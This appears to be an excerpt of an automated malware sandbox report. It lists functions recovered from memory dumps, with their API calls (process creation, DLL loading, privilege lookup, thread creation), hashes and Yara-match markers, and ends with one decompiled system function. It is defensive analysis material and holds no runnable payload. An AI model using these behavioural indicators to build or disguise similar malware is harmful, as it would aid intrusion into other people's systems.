                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
                                              • Instruction ID: 81c3fc9cf431b443248c8f45a049a5a1c52b15b03f8d4c4df705f79ba51fb8c5
                                              • Opcode Fuzzy Hash: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
                                              • Instruction Fuzzy Hash: 7D90027124100846F11071598404F46000597F4345F51C02AE0115668D8655D8557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
                                              • Instruction ID: 0d08fb4d96013d097328c51371e05d333170b4d6e436f6c09bf41ed0021d4fc1
                                              • Opcode Fuzzy Hash: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
                                              • Instruction Fuzzy Hash: 9890027124100406F11075999408A46000597F4345F51D025E5015569EC6A5D8957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
                                              • Instruction ID: bdcf523ae27eb52ecf403699949c1880f3aa041d7a75a4a921619b7a5b918841
                                              • Opcode Fuzzy Hash: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
                                              • Instruction Fuzzy Hash: 6C90027135114406F1207159C404B06000597E5245F51C425E081556CD86D5D8957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04779780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
                                              • Instruction ID: b619b6b36c51970f45ae2b25bfcb1fdb726bb728d7f4f3a6b61ad7235f31f14f
                                              • Opcode Fuzzy Hash: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
                                              • Instruction Fuzzy Hash: 0890027925300006F19071599408A0A000597E5246F91D429E000656CCC955D86D7361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00167310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 001673B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: faa541aa2a1b6ba99a9cd5acfcdb1a2c927df65a850568567e9b478c57c8b9bd
                                              • Instruction ID: 31db847f7494eaeb8cf5317ea19db84305537e9d37ed5af2537509619d4c17ae
                                              • Opcode Fuzzy Hash: faa541aa2a1b6ba99a9cd5acfcdb1a2c927df65a850568567e9b478c57c8b9bd
                                              • Instruction Fuzzy Hash: B53190B6606600ABD711DF64CCA1FA7B7B8FF98704F00811DFA195B281D770A555CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0016730B, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 001673B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 09290e8709883964a714db510bf3baddf9b4f508ec8f8469145f8fd470e09322
                                              • Instruction ID: 8fc7becf230d2240c68384ad9f278c25443f6d6579efb3d226679ce5c0ae426b
                                              • Opcode Fuzzy Hash: 09290e8709883964a714db510bf3baddf9b4f508ec8f8469145f8fd470e09322
                                              • Instruction Fuzzy Hash: CB2180B5605200ABD710DF64CCA1FABBBB4BF58704F048119FA196B281D770A565CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001688F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153B93), ref: 0016892D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 0e05f82afda62833b6e2a9e3195558413027f4a0b09dc518a559e1c37d6a21b0
                                              • Instruction ID: 4fd1e9901f5db17a47f04487d71a598694cf01ff8c0af92dccbb61a8a433481e
                                              • Opcode Fuzzy Hash: 0e05f82afda62833b6e2a9e3195558413027f4a0b09dc518a559e1c37d6a21b0
                                              • Instruction Fuzzy Hash: 9EF0BEB82082855BDB04EF689CC08AB77A8BF813287218A5AEC4947243D630D52987A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00168900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153B93), ref: 0016892D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction ID: d3311f5bc010676f2940a24a52a907b115b29aa7e569a615d500a1b9047e2d7d
                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction Fuzzy Hash: 2BE04FB12002086BD714DF59CC49EA777ACEF88750F114554FD0857242C630F910CAF0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00157290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001572EA
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0015730B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                              • Instruction ID: 9ac823bc535481a7f8c6d7c247e6bac13ac7d4a498c91bae6561ccdd5180df92
                                              • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                              • Instruction Fuzzy Hash: 9001A231A80228BAE721A6949C03FBE776CAF11B51F040118FF04BE1C1E7946A0A47F6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00159B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00159BC2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction ID: 5ee69dc2d16e9b986f452e95c750c8faed23fe153e7353bee3e4ff859f5a71d3
                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                              • Instruction Fuzzy Hash: 8E011EB5E0020DEBEB10DBA4EC82F9DB7789B54308F044195ED18AB241F771EB58CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00168970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001689C4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction ID: 9f9fbe86214f4ad39178c9fee659377c9e340cecd462fb7c8a4c7e12569ea29d
                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction Fuzzy Hash: 4701AFB2210108ABCB54DF8DDC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00167440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015CD00,?,?), ref: 0016747C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                              • Instruction ID: 82ac37cb25d956bd72648002c2aa4095c50de69556c75adffd4bf3c41dcbdbcc
                                              • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                              • Instruction Fuzzy Hash: C4E092333843143AE330659DAC03FA7B39CCB91B24F150026FA0DEB2C1DA95F81142A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00167433, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015CD00,?,?), ref: 0016747C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: a2c5fc05f77908fea2a82eaa2c1e9958a10f31720c3122e6b87bc566828049bd
                                              • Instruction ID: e354d66bfccd806c9691808096afdad5e3e2bb3a4e17b739b951bea3ff8390b5
                                              • Opcode Fuzzy Hash: a2c5fc05f77908fea2a82eaa2c1e9958a10f31720c3122e6b87bc566828049bd
                                              • Instruction Fuzzy Hash: 81F0E5327843003AE2316A9C9C02FA777A88BA1B10F150515F64DAB2C1CA91F8058264
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001688C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00163546,?,00163CBF,00163CBF,?,00163546,?,?,?,?,?,00000000,00000000,?), ref: 001688ED
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction ID: c765ecd3eb57907497e24e56e51007c8de28e74014b943e8c0e8b3d261ca106e
                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction Fuzzy Hash: 69E012B1200208ABDB14EF99CC85EA777ACAF88660F118558BE085B242C630F910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00168A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0015CFD2,0015CFD2,?,00000000,?,?), ref: 00168A90
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction ID: e1e54db0abb46dd55f9992a663734152b93b26e5db6fdffac95238e73253320b
                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction Fuzzy Hash: 50E01AB12002086BDB10DF49CC85EE737ADAF89650F118154BE0857242CA30E8108BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0015D437, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00157C93,?), ref: 0015D46B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                              • Instruction ID: f2d76e958721b087750e1e334c736cd98798a45fcd0c63739ed42d771a6b8384
                                              • Opcode Fuzzy Hash: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                              • Instruction Fuzzy Hash: 3AE08C316402046AE720EAB89C02FAA27959B55610F094064F88AE73C3EA21E505C621
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0015D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00157C93,?), ref: 0015D46B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction ID: f70e833eb6b3e07160ff808d0fddf7bca46bb14bab0e11ea3f95298c0ddd73de
                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction Fuzzy Hash: 3AD0A7717503087BE610FAA89C03F2632CC5B55B00F494064F949DB3C3DA60F5008171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0477967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                              • Instruction ID: f348a3b8e337c0aa3fd3521df3a537db9dca7cba57e5b53e0b4bb39d6b362390
                                              • Opcode Fuzzy Hash: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                              • Instruction Fuzzy Hash: D0B09BF19424C5C9FB11E7604608F17790077E4745F56C175D2024655A4778D095F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 001688FA, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00163546,?,00163CBF,00163CBF,?,00163546,?,?,?,?,?,00000000,00000000,?), ref: 001688ED
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction ID: 5f1f30f6e766c1b20299d2eafaa3380faee30b86303d34123a54768dba1595c6
                                              • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction Fuzzy Hash: 9DA022B3A20088000020B3F23C0C3AAE20C80C33BB0200EEFC00C320838883C028322E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 047CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E047CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0477CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E047C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E047C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x047cfdda
                                              0x047cfde2
                                              0x047cfde5
                                              0x047cfdec
                                              0x047cfdfa
                                              0x047cfdff
                                              0x047cfe0a
                                              0x047cfe0f
                                              0x047cfe17
                                              0x047cfe1e
                                              0x047cfe19
                                              0x047cfe19
                                              0x047cfe19
                                              0x047cfe20
                                              0x047cfe21
                                              0x047cfe22
                                              0x047cfe25
                                              0x047cfe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047CFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047CFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047CFE01
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp Download File
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                              • Instruction ID: 46021486248fe692521ec4119820fb3e66fe73dd92f8b430ebebee68d28c9f08
                                              • Opcode Fuzzy Hash: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                              • Instruction Fuzzy Hash: 2AF0F672240611BFEA201A55DC0AF23BB5AEB44730F24435CF628562E1EA62F86096F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%